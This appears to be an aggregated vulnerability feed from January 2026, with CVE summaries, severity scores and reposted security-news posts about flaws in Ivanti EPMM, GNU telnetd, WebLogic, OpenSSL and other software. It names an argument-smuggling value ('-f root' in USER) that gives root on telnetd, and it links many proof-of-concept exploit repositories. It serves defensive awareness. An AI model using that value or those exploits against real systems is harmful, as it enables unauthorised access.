thehackerwire@mastodon.social at 2026-01-29T22:21:35.000Z ##

🔴 CVE-2026-1340 - Critical (9.8)

A code injection in Ivanti Endpoint Manager Mobile allowing attackers to achieve unauthenticated remote code execution.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

oversecurity@mastodon.social at 2026-01-29T22:20:07.000Z ##

Ivanti warns of two EPMM flaws exploited in zero-day attacks

Ivanti has disclosed two critical vulnerabilities in Ivanti Endpoint Manager Mobile (EPMM), tracked as CVE-2026-1281 and CVE-2026-1340, that were...

🔗️ [Bleepingcomputer] link.is.it/teik2H

##

CVE-2026-1281
(9.8 CRITICAL)

EPSS: 0.00%

updated 2026-01-29T22:15:53.140000

6 posts

A code injection in Ivanti Endpoint Manager Mobile allowing attackers to achieve unauthenticated remote code execution.

cyberveille@mastobot.ping.moi at 2026-01-30T08:30:04.000Z ##

📢 Ivanti alerte sur deux failles critiques EPMM exploitées en zero‑day (CVE‑2026‑1281/1340)
📝 Source: BleepingComputer — Ivanti a divulgué deux failles critiques dans En...
📖 cyberveille : cyberveille.ch/posts/2026-01-3
🌐 source : bleepingcomputer.com/news/secu
#CVE_2026_1281 #CVE_2026_1340 #Cyberveille

##

secdb at 2026-01-30T00:00:21.113Z ##

🚨 [CISA-2026:0129] CISA Adds One Known Exploited Vulnerability to Catalog (secdb.nttzen.cloud/security-ad)

CISA has added one new vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.

⚠️ CVE-2026-1281 (secdb.nttzen.cloud/cve/detail/)
- Name: Ivanti Endpoint Manager Mobile (EPMM) Code Injection Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Ivanti
- Product: Endpoint Manager Mobile (EPMM)
- Notes: Please adhere to Ivanti&#39;s guidelines to assess exposure and mitigate risks. Check for signs of potential compromise on all internet accessible Ivanti products affected by this vulnerability. Apply any final mitigations provided by the vendor as soon as possible. For more information please: see: forums.ivanti.com/s/article/Se ; support.mobileiron.com/mi/vsp/ ; support.mobileiron.com/mi/vsp/ ; nvd.nist.gov/vuln/detail/CVE-2

##

thehackerwire@mastodon.social at 2026-01-29T22:21:25.000Z ##

🔴 CVE-2026-1281 - Critical (9.8)

A code injection in Ivanti Endpoint Manager Mobile allowing attackers to achieve unauthenticated remote code execution.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

oversecurity@mastodon.social at 2026-01-29T22:20:07.000Z ##

Ivanti warns of two EPMM flaws exploited in zero-day attacks

Ivanti has disclosed two critical vulnerabilities in Ivanti Endpoint Manager Mobile (EPMM), tracked as CVE-2026-1281 and CVE-2026-1340, that were...

🔗️ [Bleepingcomputer] link.is.it/teik2H

##

thehackerwire@mastodon.social at 2026-01-29T22:21:25.000Z ##

🔴 CVE-2026-1281 - Critical (9.8)

A code injection in Ivanti Endpoint Manager Mobile allowing attackers to achieve unauthenticated remote code execution.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

oversecurity@mastodon.social at 2026-01-29T22:20:07.000Z ##

Ivanti warns of two EPMM flaws exploited in zero-day attacks

Ivanti has disclosed two critical vulnerabilities in Ivanti Endpoint Manager Mobile (EPMM), tracked as CVE-2026-1281 and CVE-2026-1340, that were...

🔗️ [Bleepingcomputer] link.is.it/teik2H

##

CVE-2025-69516
(8.8 HIGH)

EPSS: 0.00%

updated 2026-01-29T22:15:52.577000

2 posts

A Server-Side Template Injection (SSTI) vulnerability in the /reporting/templates/preview/ endpoint of Amidaware Tactical RMM, affecting versions equal to or earlier than v1.3.1, allows low-privileged users with Report Viewer or Report Manager permissions to achieve remote command execution on the server. This occurs due to improper sanitization of the template_md parameter, enabling direct inject

thehackerwire@mastodon.social at 2026-01-29T22:23:12.000Z ##

🟠 CVE-2025-69516 - High (8.8)

A Server-Side Template Injection (SSTI) vulnerability in the /reporting/templates/preview/ endpoint of Amidaware Tactical RMM, affecting versions equal to or earlier than v1.3.1, allows low-privileged users with Report Viewer or Report Manager per...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-01-29T22:23:12.000Z ##

🟠 CVE-2025-69516 - High (8.8)

A Server-Side Template Injection (SSTI) vulnerability in the /reporting/templates/preview/ endpoint of Amidaware Tactical RMM, affecting versions equal to or earlier than v1.3.1, allows low-privileged users with Report Viewer or Report Manager per...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-56005
(9.8 CRITICAL)

EPSS: 0.41%

updated 2026-01-29T21:30:26

1 posts

An undocumented and unsafe feature in the PLY (Python Lex-Yacc) library 3.11 allows Remote Code Execution (RCE) via the `picklefile` parameter in the `yacc()` function. This parameter accepts a `.pkl` file that is deserialized with `pickle.load()` without validation. Because `pickle` allows execution of embedded code via `__reduce__()`, an attacker can achieve code execution by passing a malicious

2 repos

https://github.com/tom025/ply_exploit_rejection

https://github.com/bohmiiidd/Undocumument_RCE_PLY-yacc-CVE-2025-56005

beyondmachines1@infosec.exchange at 2026-01-27T08:01:02.000Z ##

Critical Remote Code Execution Vulnerability Reported in Python PLY Library

A critical remote code execution vulnerability (CVE-2025-56005) was reported in the Python PLY library version 3.11 due to an undocumented and unsafe use of the pickle module. Attackers can exploit this flaw to run arbitrary code during parser initialization by providing a malicious pickle file.

**If you use Python PLY library, search and remove any use of the picklefile parameter - it's vulnerable with no fix available. Regenerate parser tables at startup instead and lock down write access to prevent attackers from planting malicious files.**
#cybersecurity #infosec #advisory #vulnerability
beyondmachines.net/event_detai

##

CVE-2025-71003
(7.5 HIGH)

EPSS: 0.02%

updated 2026-01-29T21:15:52.617000

2 posts

An input validation vulnerability in the flow.arange() component of OneFlow v0.9.0 allows attackers to cause a Denial of Service (DoS) via a crafted input.

thehackerwire@mastodon.social at 2026-01-29T21:33:54.000Z ##

🟠 CVE-2025-71003 - High (7.5)

An input validation vulnerability in the flow.arange() component of OneFlow v0.9.0 allows attackers to cause a Denial of Service (DoS) via a crafted input.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-01-29T21:33:54.000Z ##

🟠 CVE-2025-71003 - High (7.5)

An input validation vulnerability in the flow.arange() component of OneFlow v0.9.0 allows attackers to cause a Denial of Service (DoS) via a crafted input.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-22260
(7.5 HIGH)

EPSS: 0.01%

updated 2026-01-29T21:03:54.520000

1 posts

Suricata is a network IDS, IPS and NSM engine. Starting in version 8.0.0 and prior to version 8.0.3, Suricata can crash with a stack overflow. Version 8.0.3 patches the issue. As a workaround, use default values for `request-body-limit` and `response-body-limit`.

thehackerwire@mastodon.social at 2026-01-27T18:37:13.000Z ##

🟠 CVE-2026-22260 - High (7.5)

Suricata is a network IDS, IPS and NSM engine. Starting in version 8.0.0 and prior to version 8.0.3, Suricata can crash with a stack overflow. Version 8.0.3 patches the issue. As a workaround, use default values for `request-body-limit` and `respo...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-21962
(10.0 CRITICAL)

EPSS: 0.04%

updated 2026-01-29T21:00:30.780000

3 posts

Vulnerability in the Oracle HTTP Server, Oracle Weblogic Server Proxy Plug-in product of Oracle Fusion Middleware (component: Weblogic Server Proxy Plug-in for Apache HTTP Server, Weblogic Server Proxy Plug-in for IIS). Supported versions that are affected are 12.2.1.4.0, 14.1.1.0.0 and 14.1.2.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to c

4 repos

https://github.com/Ashwesker/Ashwesker-CVE-2026-21962

https://github.com/ThumpBo/CVE-2026-21962

https://github.com/gglessner/cve_2026_21962_scanner

https://github.com/samael0x4/CVE-2026-21962

571906@ap.podcastindex.org at 2026-01-29T12:40:11.000Z ##

New Episode: SANS Stormcast Thursday, January 29th, 2026: WebLogic AI Slop; Fortinet Patches; WebLogic AI Slop; Fortinet Patches

Shownotes:

Odd WebLogic Request. Possible CVE-2026-21962 Exploit Attempt or AI Slop?
We are seeing attempts to attack CVE-2026-21962, a recent weblog vulnerability, using a non-working AI slop exploit
https://isc.sans.edu/diary/Odd%20WebLogic%20Reques

Transcript

AntennaPod | Anytime Player | Apple Podcasts | Castamatic | CurioCaster | Fountain | gPodder | Overcast | Pocket Casts | Podcast Addict | Podcast Guru | Podnews | Podverse | Truefans

Or Listen right here.

##

sans_isc@infosec.exchange at 2026-01-28T15:56:17.000Z ##

Odd WebLogic Request. Possible CVE-2026-21962 Exploit Attempt or AI Slop? isc.sans.edu/diary/32662

##

AAKL@infosec.exchange at 2026-01-27T15:55:31.000Z ##

EUVD has listed critical CVE-2026-21962 Oracle HTTP Server vulnerability euvd.enisa.europa.eu/vulnerabi

Oracle Critical Patch Update Advisory - January 2026 oracle.com/security-alerts/cpu #infosec #vulnerability #Oracle

##

CVE-2026-22806
(9.1 CRITICAL)

EPSS: 0.00%

updated 2026-01-29T20:16:10.277000

2 posts

vCluster Platform provides a Kubernetes platform for managing virtual clusters, multi-tenancy, and cluster sharing. Prior to versions 4.6.0, 4.5.4, 4.4.2, and 4.3.10, when an access key is created with a limited scope, the scope can be bypassed to access resources outside of it. However, the user still cannot access resources beyond what is accessible to the owner of the access key. Versions 4.6.0

thehackerwire@mastodon.social at 2026-01-29T20:18:44.000Z ##

🔴 CVE-2026-22806 - Critical (9.1)

vCluster Platform provides a Kubernetes platform for managing virtual clusters, multi-tenancy, and cluster sharing. Prior to versions 4.6.0, 4.5.4, 4.4.2, and 4.3.10, when an access key is created with a limited scope, the scope can be bypassed to...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-01-29T20:18:44.000Z ##

🔴 CVE-2026-22806 - Critical (9.1)

vCluster Platform provides a Kubernetes platform for managing virtual clusters, multi-tenancy, and cluster sharing. Prior to versions 4.6.0, 4.5.4, 4.4.2, and 4.3.10, when an access key is created with a limited scope, the scope can be bypassed to...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-69602
(9.1 CRITICAL)

EPSS: 0.02%

updated 2026-01-29T20:16:09.663000

2 posts

A session fixation vulnerability exists in 66biolinks v62.0.0 by AltumCode, where the application does not regenerate the session identifier after successful authentication. As a result, the same session cookie value is reused for users logging in from the same browser, allowing an attacker who can set or predict a session ID to potentially hijack an authenticated session.

thehackerwire@mastodon.social at 2026-01-29T20:19:43.000Z ##

🔴 CVE-2025-69602 - Critical (9.1)

A session fixation vulnerability exists in 66biolinks v62.0.0 by AltumCode, where the application does not regenerate the session identifier after successful authentication. As a result, the same session cookie value is reused for users logging in...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-01-29T20:19:43.000Z ##

🔴 CVE-2025-69602 - Critical (9.1)

A session fixation vulnerability exists in 66biolinks v62.0.0 by AltumCode, where the application does not regenerate the session identifier after successful authentication. As a result, the same session cookie value is reused for users logging in...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-24061
(9.8 CRITICAL)

EPSS: 24.86%

updated 2026-01-29T19:16:19.890000

5 posts

telnetd in GNU Inetutils through 2.7 allows remote authentication bypass via a "-f root" value for the USER environment variable.

Nuclei template

43 repos

https://github.com/infat0x/CVE-2026-24061

https://github.com/ms0x08-dev/CVE-2026-24061-POC

https://github.com/balgan/CVE-2026-24061

https://github.com/FurkanKAYAPINAR/CVE-2026-24061-telnet2root

https://github.com/Gabs-hub/CVE-2026-24061_Lab

https://github.com/BrainBob/Telnet-TestVuln-CVE-2026-24061

https://github.com/Lingzesec/CVE-2026-24061-GUI

https://github.com/SystemVll/CVE-2026-24061

https://github.com/m3ngx1ng/cve_2026_24061_cli

https://github.com/Parad0x7e/CVE-2026-24061

https://github.com/h3athen/CVE-2026-24061

https://github.com/parameciumzhang/Tell-Me-Root

https://github.com/MY0723/GNU-Inetutils-telnet-CVE-2026-24061-

https://github.com/duy-31/CVE-2026-24061---telnetd

https://github.com/punitdarji/telnetd-cve-2026-24061

https://github.com/z3n70/CVE-2026-24061

https://github.com/midox008/CVE-2026-24061

https://github.com/androidteacher/CVE-2026-24061-PoC-Telnetd

https://github.com/SafeBreach-Labs/CVE-2026-24061

https://github.com/yanxinwu946/CVE-2026-24061--telnetd

https://github.com/TryA9ain/CVE-2026-24061

https://github.com/cyberpoul/CVE-2026-24061-POC

https://github.com/cumakurt/tscan

https://github.com/leonjza/inetutils-telnetd-auth-bypass

https://github.com/hackingyseguridad/root

https://github.com/hilwa24/CVE-2026-24061

https://github.com/Mr-Zapi/CVE-2026-24061

https://github.com/xuemian168/CVE-2026-24061

https://github.com/typeconfused/CVE-2026-24061

https://github.com/madfxr/Twenty-Three-Scanner

https://github.com/r00tuser111/CVE-2026-24061

https://github.com/Ashwesker/Ashwesker-CVE-2026-24061

https://github.com/BrainBob/CVE-2026-24061

https://github.com/novitahk/Exploit-CVE-2026-24061

https://github.com/JayGLXR/CVE-2026-24061-POC

https://github.com/XsanFlip/CVE-2026-24061-Scanner

https://github.com/monstertsl/CVE-2026-24061

https://github.com/dotelpenguin/telnetd_CVE-2026-24061_tester

https://github.com/Chocapikk/CVE-2026-24061

https://github.com/0x7556/CVE-2026-24061

https://github.com/Alter-N0X/CVE-2026-24061-POC

https://github.com/LucasPDiniz/CVE-2026-24061

https://github.com/DeadlyHollows/CVE-2026-24061-setup

benzogaga33@mamot.fr at 2026-01-29T16:40:03.000Z ##

Un accès root en une seule commande : cette faille dans GNU InetUtils menace les accès Telnet it-connect.fr/faille-cve-2026- #ActuCybersécurité #Cybersécurité #Vulnérabilité

##

benzogaga33@mamot.fr at 2026-01-29T16:40:03.000Z ##

Un accès root en une seule commande : cette faille dans GNU InetUtils menace les accès Telnet it-connect.fr/faille-cve-2026- #ActuCybersécurité #Cybersécurité #Vulnérabilité

##

hackmag@infosec.exchange at 2026-01-29T05:00:10.000Z ##

⚪ 800,000 Telnet servers are vulnerable to remote attacks

🗨️ Shadowserver Foundation analysts are tracking nearly 800,000 IP addresses amid the active exploitation of a critical vulnerability, CVE-2026-24061, in the GNU InetUtils telnetd server component.

🔗 hackmag.com/news/telnetd?utm_s

#news

##

stux@mstdn.social at 2026-01-28T20:25:37.000Z ##

Nearly 800,000 #Telnet servers exposed to remote attacks

The security flaw (CVE-2026-24061) already has a proof-of-concept exploit, impacts GNU InetUtils versions 1.9.3 (released in 2015) through 2.7, and was patched in version 2.8 (released on January 20).

bleepingcomputer.com/news/secu

##

linux@activitypub.awakari.com at 2026-01-27T08:36:37.000Z ## Critical GNU InetUtils Telnetd Vulnerability Allows Authentication Bypass and Root Access The discovery of CVE-2026-24061 exposes a long-standing critical weakness in the GNU InetUtils telnet daemo...

#Category(Default) #- #Do #Not #Use #This

Origin | Interest | Match ##

CVE-2026-22795
(5.5 MEDIUM)

EPSS: 0.03%

updated 2026-01-29T19:16:19.670000

1 posts

Issue summary: An invalid or NULL pointer dereference can happen in an application processing a malformed PKCS#12 file. Impact summary: An application processing a malformed PKCS#12 file can be caused to dereference an invalid or NULL pointer on memory read, resulting in a Denial of Service. A type confusion vulnerability exists in PKCS#12 parsing code where an ASN1_TYPE union member is accessed

DarkWebInformer@infosec.exchange at 2026-01-29T00:50:43.000Z ##

‼️AISLE Goes 12-for-12 on OpenSSL Vulnerability Detection

CVEs Published: January 27th, 2026

High and Moderate Severity Flaws:

▪️CVE-2025-15467: Stack Buffer Overflow in CMS AuthEnvelopedData Parsing (High): A vulnerability with the potential to enable remote code execution under specific conditions

▪️CVE-2025-11187: PBMAC1 Parameter Validation in PKCS#12 (Moderate): Missing validation that could trigger a stack-based buffer overflow

Low Severity Flaws:

▪️CVE-2025-15468: Crash in QUIC protocol cipher handling
▪️CVE-2025-15469: Silent truncation bug affecting post-quantum signature algorithms (ML-DSA)
▪️CVE-2025-66199: Memory exhaustion via TLS 1.3 certificate compression
▪️CVE-2025-68160: Memory corruption in line-buffering (affects code back to OpenSSL 1.0.2)
▪️CVE-2025-69418: Encryption flaw in OCB mode on hardware-accelerated paths
▪️CVE-2025-69419: Memory corruption in PKCS#12 character encoding
▪️CVE-2025-69420: Crash in TimeStamp Response verification
▪️CVE-2025-69421: Crash in PKCS#12 decryption
▪️CVE-2026-22795: Crash in PKCS#12 parsing
▪️CVE-2026-22796: Crash in PKCS#7 signature verification (affects code back to OpenSSL 1.0.2)

"When parsing CMS AuthEnvelopedData structures that use AEAD ciphers such as AES-GCM, the IV (Initialization Vector) encoded in the ASN.1 parameters is copied into a fixed-size stack buffer without verifying that its length fits the destination. An attacker can supply a crafted CMS message with an oversized IV, causing a stack-based out-of-bounds write before any authentication or tag verification occurs.

Applications and services that parse untrusted CMS or PKCS#7 content using AEAD ciphers (e.g., S/MIME AuthEnvelopedData with AES-GCM) are vulnerable. Because the overflow occurs prior to authentication, no valid key material is required to trigger it. While exploitability to remote code execution depends on platform and toolchain mitigations, the stack-based write primitive represents a severe risk."

Writeup: aisle.com/blog/aisle-discovere

##

CVE-2026-1610
(8.1 HIGH)

EPSS: 0.00%

updated 2026-01-29T19:16:19.483000

2 posts

A vulnerability was found in Tenda AX12 Pro V2 16.03.49.24_cn. Affected by this issue is some unknown functionality of the component Telnet Service. Performing a manipulation results in hard-coded credentials. The attack is possible to be carried out remotely. A high degree of complexity is needed for the attack. The exploitation is known to be difficult. The exploit has been made public and could

thehackerwire@mastodon.social at 2026-01-29T19:47:15.000Z ##

🟠 CVE-2026-1610 - High (8.1)

A vulnerability was found in Tenda AX12 Pro V2 16.03.49.24_cn. Affected by this issue is some unknown functionality of the component Telnet Service. Performing a manipulation results in hard-coded credentials. The attack is possible to be carried ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-01-29T19:47:15.000Z ##

🟠 CVE-2026-1610 - High (8.1)

A vulnerability was found in Tenda AX12 Pro V2 16.03.49.24_cn. Affected by this issue is some unknown functionality of the component Telnet Service. Performing a manipulation results in hard-coded credentials. The attack is possible to be carried ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-1453
(9.8 CRITICAL)

EPSS: 0.00%

updated 2026-01-29T19:16:18.987000

4 posts

A missing authentication for critical function vulnerability in KiloView Encoder Series could allow an unauthenticated attacker to create or delete administrator accounts. This vulnerability can grant the attacker full administrative control over the product.

beyondmachines1 at 2026-01-30T08:01:05.506Z ##

KiloView Encoder Account Takeover Vulnerability

KiloView video encoders contain a critical vulnerability (CVE-2026-1453) that allows unauthenticated attackers to create administrator accounts and take full control of the devices. The vendor has not yet released a public patch.

**Make sure all KiloView devices are isolated from the internet and accessible from trusted networks only. Then reach out to the vendor to get information of any upcoming patches. At the moment, there is no patch available.**

beyondmachines.net/event_detai

##

thehackerwire@mastodon.social at 2026-01-29T19:47:24.000Z ##

🔴 CVE-2026-1453 - Critical (9.8)

A missing authentication for critical function vulnerability in KiloView Encoder Series could allow an unauthenticated attacker to create or delete administrator accounts. This vulnerability can grant the attacker full administrative control over ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

beyondmachines1@infosec.exchange at 2026-01-30T08:01:05.000Z ##

KiloView Encoder Account Takeover Vulnerability

KiloView video encoders contain a critical vulnerability (CVE-2026-1453) that allows unauthenticated attackers to create administrator accounts and take full control of the devices. The vendor has not yet released a public patch.

**Make sure all KiloView devices are isolated from the internet and accessible from trusted networks only. Then reach out to the vendor to get information of any upcoming patches. At the moment, there is no patch available.**
#cybersecurity #infosec #advisory #vulnerability
beyondmachines.net/event_detai

##

thehackerwire@mastodon.social at 2026-01-29T19:47:24.000Z ##

🔴 CVE-2026-1453 - Critical (9.8)

A missing authentication for critical function vulnerability in KiloView Encoder Series could allow an unauthenticated attacker to create or delete administrator accounts. This vulnerability can grant the attacker full administrative control over ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-71007
(7.5 HIGH)

EPSS: 0.02%

updated 2026-01-29T19:16:18.393000

6 posts

An input validation vulnerability in the oneflow.index_add component of OneFlow v0.9.0 allows attackers to cause a Denial of Service (DoS) via a crafted input.

thehackerwire@mastodon.social at 2026-01-29T20:03:03.000Z ##

🟠 CVE-2025-71007 - High (7.5)

An input validation vulnerability in the oneflow.index_add component of OneFlow v0.9.0 allows attackers to cause a Denial of Service (DoS) via a crafted input.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-01-29T19:48:09.000Z ##

🟠 CVE-2025-71007 - High (7.5)

An input validation vulnerability in the oneflow.index_add component of OneFlow v0.9.0 allows attackers to cause a Denial of Service (DoS) via a crafted input.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-01-29T19:47:35.000Z ##

🟠 CVE-2025-71007 - High (7.5)

An input validation vulnerability in the oneflow.index_add component of OneFlow v0.9.0 allows attackers to cause a Denial of Service (DoS) via a crafted input.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-01-29T20:03:03.000Z ##

🟠 CVE-2025-71007 - High (7.5)

An input validation vulnerability in the oneflow.index_add component of OneFlow v0.9.0 allows attackers to cause a Denial of Service (DoS) via a crafted input.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-01-29T19:48:09.000Z ##

🟠 CVE-2025-71007 - High (7.5)

An input validation vulnerability in the oneflow.index_add component of OneFlow v0.9.0 allows attackers to cause a Denial of Service (DoS) via a crafted input.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-01-29T19:47:35.000Z ##

🟠 CVE-2025-71007 - High (7.5)

An input validation vulnerability in the oneflow.index_add component of OneFlow v0.9.0 allows attackers to cause a Denial of Service (DoS) via a crafted input.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-61726
(7.5 HIGH)

EPSS: 0.01%

updated 2026-01-29T19:16:16.243000

2 posts

The net/url package does not set a limit on the number of query parameters in a query. While the maximum size of query parameters in URLs is generally limited by the maximum request header size, the net/http.Request.ParseForm method can parse large URL-encoded forms. Parsing a large form containing many unique query parameters can cause excessive memory consumption.

thehackerwire@mastodon.social at 2026-01-29T19:48:18.000Z ##

🟠 CVE-2025-61726 - High (7.5)

The net/url package does not set a limit on the number of query parameters in a query. While the maximum size of query parameters in URLs is generally limited by the maximum request header size, the net/http.Request.ParseForm method can parse larg...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-01-29T19:48:18.000Z ##

🟠 CVE-2025-61726 - High (7.5)

The net/url package does not set a limit on the number of query parameters in a query. While the maximum size of query parameters in URLs is generally limited by the maximum request header size, the net/http.Request.ParseForm method can parse larg...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-14472
(8.1 HIGH)

EPSS: 0.01%

updated 2026-01-29T19:16:10.993000

2 posts

Cross-Site Request Forgery (CSRF) vulnerability in Drupal Acquia Content Hub allows Cross Site Request Forgery.This issue affects Acquia Content Hub: from 0.0.0 before 3.6.4, from 3.7.0 before 3.7.3.

thehackerwire@mastodon.social at 2026-01-29T20:03:13.000Z ##

🟠 CVE-2025-14472 - High (8.1)

Cross-Site Request Forgery (CSRF) vulnerability in Drupal Acquia Content Hub allows Cross Site Request Forgery.This issue affects Acquia Content Hub: from 0.0.0 before 3.6.4, from 3.7.0 before 3.7.3.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-01-29T20:03:13.000Z ##

🟠 CVE-2025-14472 - High (8.1)

Cross-Site Request Forgery (CSRF) vulnerability in Drupal Acquia Content Hub allows Cross Site Request Forgery.This issue affects Acquia Content Hub: from 0.0.0 before 3.6.4, from 3.7.0 before 3.7.3.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-13986
(7.5 HIGH)

EPSS: 0.02%

updated 2026-01-29T19:16:10.837000

2 posts

Authentication Bypass Using an Alternate Path or Channel vulnerability in Drupal Disable Login Page allows Functionality Bypass.This issue affects Disable Login Page: from 0.0.0 before 1.1.3.

thehackerwire@mastodon.social at 2026-01-29T19:48:27.000Z ##

🟠 CVE-2025-13986 - High (7.5)

Authentication Bypass Using an Alternate Path or Channel vulnerability in Drupal Disable Login Page allows Functionality Bypass.This issue affects Disable Login Page: from 0.0.0 before 1.1.3.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-01-29T19:48:27.000Z ##

🟠 CVE-2025-13986 - High (7.5)

Authentication Bypass Using an Alternate Path or Channel vulnerability in Drupal Disable Login Page allows Functionality Bypass.This issue affects Disable Login Page: from 0.0.0 before 1.1.3.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-13982
(8.1 HIGH)

EPSS: 0.01%

updated 2026-01-29T19:16:10.530000

2 posts

Cross-Site Request Forgery (CSRF) vulnerability in Drupal Login Time Restriction allows Cross Site Request Forgery.This issue affects Login Time Restriction: from 0.0.0 before 1.0.3.

thehackerwire@mastodon.social at 2026-01-29T20:03:23.000Z ##

🟠 CVE-2025-13982 - High (8.1)

Cross-Site Request Forgery (CSRF) vulnerability in Drupal Login Time Restriction allows Cross Site Request Forgery.This issue affects Login Time Restriction: from 0.0.0 before 1.0.3.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-01-29T20:03:23.000Z ##

🟠 CVE-2025-13982 - High (8.1)

Cross-Site Request Forgery (CSRF) vulnerability in Drupal Login Time Restriction allows Cross Site Request Forgery.This issue affects Login Time Restriction: from 0.0.0 before 1.0.3.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-24897
(10.0 CRITICAL)

EPSS: 0.44%

updated 2026-01-29T17:16:25.253000

1 posts

Erugo is a self-hosted file-sharing platform. In versions up to and including 0.2.14, an authenticated low-privileged user can upload arbitrary files to any specified location due to insufficient validation of user‑supplied paths when creating shares. By specifying a writable path within the public web root, an attacker can upload and execute arbitrary code on the server, resulting in remote code

thehackerwire@mastodon.social at 2026-01-28T23:58:27.000Z ##

🔴 CVE-2026-24897 - Critical (10)

Erugo is a self-hosted file-sharing platform. In versions up to and including 0.2.14, an authenticated low-privileged user can upload arbitrary files to any specified location due to insufficient validation of user‑supplied paths when creating s...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-71000
(7.5 HIGH)

EPSS: 0.02%

updated 2026-01-29T17:16:22.587000

2 posts

An issue in the flow.cuda.BoolTensor component of OneFlow v0.9.0 allows attackers to cause a Denial of Service (DoS) via a crafted input.

thehackerwire@mastodon.social at 2026-01-29T20:20:01.000Z ##

🟠 CVE-2025-71000 - High (7.5)

An issue in the flow.cuda.BoolTensor component of OneFlow v0.9.0 allows attackers to cause a Denial of Service (DoS) via a crafted input.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-01-29T20:20:01.000Z ##

🟠 CVE-2025-71000 - High (7.5)

An issue in the flow.cuda.BoolTensor component of OneFlow v0.9.0 allows attackers to cause a Denial of Service (DoS) via a crafted input.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-70999
(7.5 HIGH)

EPSS: 0.02%

updated 2026-01-29T17:16:22.420000

2 posts

A GPU device-ID validation flaw in the flow.cuda.get_device_capability() component of OneFlow v0.9.0 allows attackers to cause a Denial of Service (DoS) via a crafted device ID.

thehackerwire@mastodon.social at 2026-01-29T20:19:53.000Z ##

🟠 CVE-2025-70999 - High (7.5)

A GPU device-ID validation flaw in the flow.cuda.get_device_capability() component of OneFlow v0.9.0 allows attackers to cause a Denial of Service (DoS) via a crafted device ID.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

